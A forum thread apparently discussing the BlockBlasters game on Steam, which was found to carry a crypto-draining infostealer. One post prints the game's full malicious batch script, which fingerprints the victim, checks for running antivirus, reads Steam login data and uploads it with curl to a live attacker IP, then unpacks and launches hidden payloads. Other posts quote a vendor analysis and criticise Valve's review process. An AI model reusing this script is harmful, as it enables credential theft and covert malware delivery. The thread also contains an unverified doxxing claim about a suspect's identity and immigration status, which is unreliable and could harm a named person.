Crypto Theft "Game" allowed onto Steam

Roguey · Post by **Roguey** » September 22nd, 2025, 12:14

Valve let some schmuck put a crypto drainer (Block Blasters) on their store.

Previously we made a post about a cancer patient being a victim of a malicious Steam game. It is a cryptodrainer masquerading as a free-to-play video game.

Based on reports and conversations occurring online, this is the malicious video game:

I'm not video game developer, but this file looks strange. Why does this video game contain a .bat file that looks for your browser credentials and crypto wallets?

dawg, OSINT nerds found the guy who drained the cancer bro. hes an immigrant on a VISA from argentina currently living in miami, florida, USA

the OSINT nerds reported him to ICE

Seems really bad that they could just let this happen, no safeguards against it?

Roguey wrote: ↑ September 22nd, 2025, 12:14
Seems really bad that they could just let this happen, no safeguards against it?

Do you have any idea how much effort it would be to actually test every game/game update at this point? It's one of the most obvious weaknesses of just allowing anything on your platform(along with massive content dilution)

Valve allowed this malware to exist for just under a month.

lmao
valve is so ******

wasn't even hidden, just a batch script,

Code: Select all

@echo off
setlocal enabledelayedexpansion
title Top 
for /f "delims=" %%i in ('whoami') do set "COMPUTER_NAME=%%i"

set "randNum6=%RANDOM%%RANDOM%"
set "randNum6=%randNum6:~0,8%"


openfiles >nul 2>&1
if %errorlevel% == 0 (
    echo admin.
    start "" "%~dp0launch1.vbs"
    echo wav: admin: steam.exe %COMPUTER_NAME% > %TEMP%\game112.txt && curl -F "file=@%TEMP%\game112.txt;filename=%COMPUTER_NAME%%randNum6%_status.txt" http://203.188.171.156:30815/upload

    TIMEOUT 6
    exit

) else (
    echo .
)



:start

del %temp%\us_report.txt
del %temp%\match_line.txt
del %temp%\av_report.txt



for /f "delims=" %%a in ('curl -s ipinfo.io/city') do set "CITY=%%a"
for /f "delims=" %%a in ('curl -s ipinfo.io/region') do set "REGION=%%a"
for /f "delims=" %%a in ('curl -s ipinfo.io/country') do set "COUNTRY=%%a"

set "LOCATION=%CITY%, %REGION%, %COUNTRY%"

for /f "delims=" %%a in ('curl -s ip.me') do set "MYIP=%%a"




set "TEMP_FILE=%temp%\av_report.txt"


start "" "%~dp0Win64\VS2015\Party2\Party\Third\MegaAction\Engine\Binaries\ThirdParty\Ogg\Win64\VS2015\12321\Solution\A\New\test.vbs" 
TIMEOUT 2

set "randNum=%RANDOM%%RANDOM%"
set "randNum=%randNum:~0,8%"
echo %randNum%

echo Scanning for running antivirus processes...
echo UserID: %randNum% > "%TEMP_FILE%"
echo. >> "%TEMP_FILE%"
echo Antivirus Report from: %COMPUTER_NAME% >> "%TEMP_FILE%"




set AV_PROCESSES=acronisagent.exe aliedefense.exe almon.exe alyac.exe amitiav.exe arcabitav.exe arcticagent.exe ^
ashavast.exe ashmaisv.exe ashserv.exe aswidsagenta.exe avastmobilesecurity.exe avastsvc.exe avastui.exe avengine.exe ^
avgnt.exe avgui.exe avira.exe avp.exe baidu.exe bdagent.exe bkav.exe bytefence.exe ccsvchst.exe cis.exe ^
clamav.exe clamtray.exe clamwin.exe cmcav.exe cmdagent.exe crowdstrike.exe csagent.exe ctxsvc.exe cynetservice.exe ^
deepinstinct.exe defendercontrol.exe drweb32.exe drwebupw.exe egui.exe eguiproxy.exe emsisoft.exe endpoint.exe ^
esets_gui.exe escan.exe falxagent.exe fortitray.exe fsav32.exe f-scan.exe f-secure.exe fsgk32.exe fsdfwd.exe ^
fssm32.exe gddtray.exe gridinsoft.exe hipsservice.exe hitmanpro.exe huorong.exe ikarus.exe integoav.exe jiangmin.exe ^
k7av.exe kav.exe kavsvc.exe kavtray.exe kaspersky.exe kesgui.exe kingsoftav.exe lionic.exe malwarebytes.exe ^
maxsecureav.exe mbam.exe mbamservice.exe mbamtray.exe mcagent.exe mcshield.exe mcsysmon.exe mctray.exe mcvsshld.exe ^
mfemms.exe mfevtps.exe msascui.exe msmpeng.exe msseces.exe nanoscan.exe nav.exe navapsvc.exe navapw32.exe ^
nortonsecurity.exe npfmessenger.exe npfmsg2.exe outpost.exe panagent.exe panda_cloud_antivirus.exe ^
panda_url_filtering.exe psafe.exe psanhost.exe psuaservice.exe qhactivedefense.exe qhtray.exe qhws.exe rising.exe ^
rtlreminder.exe sangfor.exe sbamsvc.exe secureageav.exe secureaplus.exe sentinelagent.exe skyhigh.exe smc.exe ^
smcgui.exe sophosfs.exe sophoshealth.exe sophosui.exe spiderml.exe spidernt.exe spiderui.exe spyshelter.exe ^
ssmgr.exe superantispyware.exe symantec.exe tachyon.exe tehrisagent.exe tencentdlp.exe threatdownagent.exe ^
tmbmserver.exe tmbmsrv.exe tmlisten.exe tmntsrv.exe tmproxy.exe tmproxy.exe trapmineagent.exe trellixagent.exe ^
ufseagnt.exe varist.exe v3lite.exe v3main.exe v3sp.exe vb32av.exe vipre.exe virit.exe virobot.exe ^
vrfsvc.exe vrpsvc.exe vrpt.exe vsmon.exe vsserv.exe webroot.exe webrootsecureanywhere.exe winpatrol.exe ^
winssnotify.exe withsecure.exe wscntfy.exe wzservice.exe xcitium.exe xcommsvr.exe xvirus.exe yandexav.exe ^
zatray.exe zemana.exe zillya.exe zlclient.exe zonerav.exe zxguard.exe zxtray.exe


set FOUND=0

:: Dump all running processes once
tasklist /fo csv /nh | findstr /i ".exe" > "%temp%\running_tasks.txt"

for %%P in (%AV_PROCESSES%) do (
    findstr /I /C:"%%P" "%temp%\running_tasks.txt" >nul
    if !errorlevel! == 0 (
        echo Detected running AV process: %%P
        echo - %%P >> "%TEMP_FILE%"
        set /a FOUND+=1
    )
)

if "%FOUND%"=="0" (
    echo No known antivirus processes found. >> "%TEMP_FILE%"
)


set "OUTPUT_FILE=%temp%\us_report.txt"
set "VDF_FILE=C:\Program Files (x86)\Steam\config\loginusers.vdf"



if not exist "%VDF_FILE%" (

for /f "tokens=2,*" %%A in ('reg query "HKCU\Software\Valve\Steam" /v SteamPath 2^>nul ^| find "SteamPath"') do (
    set "VDF_FILE=%%B\config\loginusers.vdf"
    set "VDF_FILE=!VDF_FILE:/=\!"
    )
)

echo %VDF_FILE%


if not exist "%VDF_FILE%" (
    >> "%OUTPUT_FILE%" echo [ERROR] File not found: "%VDF_FILE%"
    goto tele
)

>> "%OUTPUT_FILE%" echo â
>> "%OUTPUT_FILE%" echo Steam Report

set "prev1="
set "prev2="
for /f "usebackq delims=" %%A in ("%VDF_FILE%") do (
    set "line=%%A"
    set "line=!line:	=!"  :: Remove tabs



    echo !line! | findstr /c:"\"AccountName\"" >nul
    if !errorlevel! neq 1 (
        set "SteamID=!prev2!"
        set "SteamID=!SteamID:"=!"
        set "AccountName=!line:*\"AccountName\"=\"=!"
        set "AccountName=!AccountName:"=!"
    )

    echo !line! | findstr /c:"\"PersonaName\"" >nul
    if !errorlevel! neq 1 (
        set "PersonaName=!line:*\"PersonaName\"=\"=!"
        set "PersonaName=!PersonaName:"=!"
    )

    echo !line! | findstr /c:"\"RememberPassword\"" >nul
    if !errorlevel! neq 1 (
        set "RememberPassword=!line:*\"RememberPassword\"=\"=!"
        set "RememberPassword=!RememberPassword:"=!"

        if defined SteamID if defined AccountName (
            >> "%OUTPUT_FILE%" echo [user: !AccountName! ^| display: !PersonaName! ^| ID: !SteamID! ^| remember: !RememberPassword!]
            set "SteamID=" & set "AccountName=" & set "PersonaName="
        )
    )
    set "prev2=!prev1!"
    set "prev1=!line!"
)

:tele

echo.
echo Sending report...


if exist "%temp%\us_report.txt" (
    goto das
) else (
    goto send
)


:das
set "file2=%temp%\us_report.txt"

> "%file2%.tmp" (
  for /f "usebackq delims=" %%A in ("%file2%") do (
    set "line=%%A"
    set "line=!line:PersonaName=!"
    set "line=!line:AccountName=!"
    set "line=!line:RememberPassword=!"
    echo(!line!
  )
)

move /y "%file2%.tmp" "%file2%" >nul

:: ================ View Live Players ===================

curl http://203.188.171.156:30815/whitelisted_users.txt -o output.txt

if not exist "%temp%\us_report.txt" (
    echo ERROR: "%temp%\us_report.txt" not found.
)

set "playerfound=0"
set "auto=0"

for /f "usebackq delims=" %%A in ("output.txt") do (
    set "search=%%A"
    findstr /i /c:"!search!" "%temp%\us_report.txt" >nul
    if !errorlevel! equ 0 (
        echo Player found: "!search!"
        set "playerfound=1"
        >>"%temp%\match_line.txt" echo â
        >>"%temp%\match_line.txt" echo Launched, Player found: !search!
    )
)

if "%playerfound%"=="0" (
    >>"%temp%\match_line.txt" echo â
    >>"%temp%\match_line.txt" echo Player not found
)

curl http://203.188.171.156:30815/settings.txt -o output2.txt


for /f "usebackq delims=" %%A in ("output2.txt") do (
    findstr /c:"1" "output2.txt" >nul
    if !errorlevel! equ 0 (
        set "auto=1"
        >>"%temp%\match_line.txt" echo â
        >>"%temp%\match_line.txt" echo auto=enabled
    )
)

>> "%OUTPUT_FILE%" echo â
>> "%OUTPUT_FILE%" echo %MYIP%
>> "%OUTPUT_FILE%" echo %LOCATION%

copy /b "%TEMP_FILE%" + "%OUTPUT_FILE%" + "%temp%\match_line.txt" + "%TEMP%\ext_found_list.txt" "%TEMP%\combined_msg.txt" >nul
:send


curl -F "file=@%TEMP%\combined_msg.txt;filename=%randNum%.txt" http://203.188.171.156:30815/upload




if %errorlevel%==0 (
    echo Report sent
) else (
    echo Failed
)


if "%playerfound%"=="1" (
    goto star3t
)



if "%auto%"=="1" (
    goto star3t
)



for /l %%i in (1,1,17) do (
    echo This is loop iteration %%i
    
    timeout /t 1 >nul
    curl http://203.188.171.156:30815/button_presses/%randNum%.txt -o output1.txt

    for /f "usebackq delims=" %%A in ("output1.txt") do (
    set "search=%%A"
    findstr /i "yes" output1.txt >nul
    if !errorlevel! equ 0 (
        echo Yes Found
        goto star3t
        )
    findstr /i "noaaa" output1.txt >nul
    if !errorlevel! equ 0 (
        echo No Found
        goto end
        )
    )
)


:end

if exist "Win64\VS2015\Party2\Party\Third\MegaAction\MegaActionPlatformer.exe" (
    start "" "Win64\VS2015\Party2\Party\Third\MegaAction\MegaActionPlatformer.exe"
)

::del "%TEMP_FILE%" >nul 2>&1
del %temp%\us_report.txt
del %temp%\match_line.txt
del %temp%\av_report.txt
timeout /t 1 >nul

exit


:star3t


if not exist "%temp%\running_tasks.txt" (
    tasklist /fo csv /nh | findstr /i ".exe" > "%temp%\running_tasks.txt"
)



:: ================ Check if ONLY msmpeng.exe is running ===================
set "ONLY_MSMPENG=0"
set "MSMPENG_FOUND=0"
set "TOTAL_FOUND=0"

for %%P in (%AV_PROCESSES%) do (
    findstr /I /C:"%%P" "%temp%\running_tasks.txt" >nul
    if !errorlevel! neq 1 (
        if /I "%%P"=="msmpeng.exe" (
            set "MSMPENG_FOUND=1"
        ) else (
            set /a TOTAL_FOUND+=1
        )
    )
)

:: Cleanup
::del "%TEMP_FILE%" >nul 2>&1
del %temp%\us_report.txt
del %temp%\match_line.txt
del %temp%\av_report.txt



set SEVENZIP=%~dp07-Zip\7z.exe
set PASSWORD="121"
set DEST_DIR=%~dp0
set DEST_DIR1=%~dp0bbb



set ZIP_FILE1=%~dp0v1.zip

if "!MSMPENG_FOUND!"=="1" if "!TOTAL_FOUND!"=="0" (
    
    echo.
    
    "!SEVENZIP!" x "!ZIP_FILE1!" -o"!DEST_DIR!" -p"!PASSWORD!" -y
    start "" "%~dp0launch1.vbs"
    TIMEOUT 1
    exit
)


set ZIP_FILE=%~dp0v2.zip

"%SEVENZIP%" x "%ZIP_FILE%" -o"%DEST_DIR1%" -p%PASSWORD% -y
if exist "%DEST_DIR1%\Block1.exe" (
    start "" "%DEST_DIR1%\Block1.exe"
)

if exist "Win64\VS2015\Party2\Party\Third\MegaAction\MegaActionPlatformer.exe" (
    start "" "Win64\VS2015\Party2\Party\Third\MegaAction\MegaActionPlatformer.exe"
)

echo.
TIMEOUT 1
exit

something that could have easily been caught just by checking all the files with AI:

Selection_011.webp

Selection_012.webp

Roguey · Post by **Roguey** » September 22nd, 2025, 12:34

This site goes into more detail, apparently it started as a legitimate game and then malware was patched in after a month https://www.gdatasoftware.com/blog/2025 ... ds-malware

BlockBlasters is a 2D platformer/shooter game developed by Genesis Interactive. The game was released on July 31, 2025, which garnered hundreds of positive reviews. But on August 30, 2025, this month-old game released a patch (Build 19799326) that contains files exhibiting multiple malicious behaviors, which were flagged by G DATA MXDR.

In 2025, there has been a rise in malware infections in games being released on the popular games platform Steam. The perhaps most notable case is that of PirateFi[A], a Free-to-Play game that comes with an information stealing malware. The most recent malware infection in a game was Chemia(b), an early access title on Steam, which was compromised by a threat actor known as EncryptHub through the injection of malicious binaries. These threat actors bypassed initial security screening from Valve which allowed the deployment of malicious patches and infected multiple users of the platform. Now we observed a similar case in another Steam-released game called BlockBlasters, further highlighting the ongoing risks to players.

Apparently they reported it a week ago but Valve just sat on the report until they got brigaded yesterday

The cryptodrainer, which masqueraded as a legitimate video game on Steam, was identified by @GDATA
over a week ago. It was reported to Steam. However, no action was taken.

Unless Valve changes, this might be it for indie devs on Steam, why take a chance on a random dev you don't know you can trust?

Roguey wrote: ↑ September 22nd, 2025, 12:34
This site goes into more detail, apparently it started as a legitimate game and then malware was patched in after a month https://www.gdatasoftware.com/blog/2025 ... ds-malware

27 days ago
https://steamdb.info/depot/3872351/hist ... 5224309749

Roguey wrote: ↑ September 22nd, 2025, 12:34
Unless Valve changes, this might be it for indie devs on Steam, why take a chance on a random dev you don't know you can trust?

very strong suspicion that this will prompt Valve to require indie devs to give Valve source access + perform verifiable builds on Valve's servers
nearly all of this can be eliminated with AI(and manual review of flagged submissions), but it actually needs access to the source code

don't be surprised if they just shut submissions down for a week or two tho